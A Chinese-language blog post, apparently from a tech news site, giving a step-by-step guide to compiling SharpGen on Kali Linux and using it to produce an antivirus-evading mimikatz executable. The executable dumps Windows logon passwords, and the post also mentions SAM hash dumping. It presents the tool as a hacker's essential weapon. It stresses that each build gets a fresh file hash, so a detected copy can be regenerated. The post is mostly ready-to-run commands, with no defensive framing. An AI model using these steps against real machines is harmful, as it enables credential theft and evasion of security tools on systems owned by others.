网站首页 > 开源技术 正文
mimikatz来自https://github.com/gentilkiwi/mimikatz,是黑客手中必不可少的一款利器,名气大也招风,已经被杀软杀得快不能用了,我试过网上太多的方法,基本还是用不了。
最近我找到了一个方法,应当还不错。
kali2024.1安装后,先升级一下:
sudo apt update
sudo apt full-upgrade
会自动装上donet 6.0。我们可以查看一下版本:dotnet --list-sdks
我是又升级了到8.0了,如果只你看本文并不需要升级。如果想升级到8.0,可以如下命令:
步骤 1:添加 Microsoft 包签名密钥和软件包源
打开终端,并运行以下命令来添加 Microsoft 的公钥,并注册其包源:
wget https://packages.microsoft.com/config/ubuntu/22.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
sudo dpkg -i packages-microsoft-prod.deb
步骤 2:安装所需的依赖项
使用以下命令来更新包列表并安装依赖项,确保系统中含有必要的库:
sudo apt update
sudo apt install -y apt-transport-https && sudo apt update
步骤 3:安装 .NET
根据您的需求选择安装 .NET SDK 或者只安装运行时 (Runtime)。.NET SDK 包括了运行时,并且用于开发应用。如果只需要运行应用,则安装运行时即可。
- 安装 .NET SDK:
- sudo apt-get install -y dotnet-sdk-8.0
只安装 .NET Runtime:
sudo apt-get install -y dotnet-runtime-8.0
下载安装并编译SharpGen:
git clone https://github.com/cobbr/SharpGen
cd SharpGen
dotnet build --configuration Release
但这时你安装的SharpGen是支持.net 20,和我们的kali环境不符。我们进入SharpGen目录,修改为.net 6.0
执行命令:sudo leafpad SharpGen.csproj
修改为:<PropertyGroup> <TargetFramework>net6.0</TargetFramework> </PropertyGroup>
更新 NuGet 包:
在项目目录中运行:dotnet restore
再重新编译一下:dotnet build --configuration Release
我们就编译完成了home/kali/SharpGen/bin/Release/net6.0/SharpGen.dll,运行一下看下:
SharpGen默认集成了SharpSploit(https://github.com/cobbr/SharpSploit),能够直接调用其中的功能。SharpGen使用了Rosyln进行动态编译,每次生成的文件hash都会不一样,这样我们被杀了一个还可以重新生成一个。
我们直接来生成一个抓取密码的mimikatz的单文件:
dotnet /home/kali/SharpGen/bin/Release/net6.0/SharpGen.dll -f example.exe "Console.WriteLine(Mimikatz.LogonPasswords());
这样你就得到了一个可靠的mimikatz。当然,它还支持SharpSploit其它的功能,类似:Command("privilege::debug lsadump::sam").等,具体你可以去看下。
我在win7上测试结果:
猜你喜欢
- 2024-10-08 不打补丁的危害有多大?黑客利用已知漏洞攻破政府服务器
- 2024-10-08 微软表示,这种多阶段攻击活动旨在破坏混合云环境
- 2024-10-08 卡巴斯基:黑客组织 Twelve 针对俄罗斯实体发动破坏性网络攻击
- 2024-10-08 揭秘最为知名的黑客工具之一:Mimikatze
- 2024-10-08 2024 年如何使用 Mimikatz 进行黑客攻击:权威指南
- 2024-07-02 欧洲爆发坏兔子勒索软件:赎金0.05个比特币
- 2024-07-02 内网横向移动—NTLM-Relay重放,Responder中继攻击,Ldap,Ews
- 2024-07-02 windows系统密码获取分析和防范(windows密码获取器)
- 2024-07-02 国内用户注意!一款“隐身”的蠕虫病毒 正在全球银行系统肆虐
- 2024-07-02 一个简单内网渗透工具,免杀(内网渗透步骤)
你 发表评论:
欢迎- 最近发表
- 标签列表
-
- jdk (81)
- putty (66)
- rufus (78)
- 内网穿透 (89)
- okhttp (70)
- powertoys (74)
- windowsterminal (81)
- netcat (65)
- ghostscript (65)
- veracrypt (65)
- asp.netcore (70)
- wrk (67)
- aspose.words (80)
- itk (80)
- ajaxfileupload.js (66)
- sqlhelper (67)
- express.js (67)
- phpmailer (67)
- xjar (70)
- redisclient (78)
- wakeonlan (66)
- tinygo (85)
- startbbs (72)
- webftp (82)
- vsvim (79)
本文暂时没有评论,来添加一个吧(●'◡'●)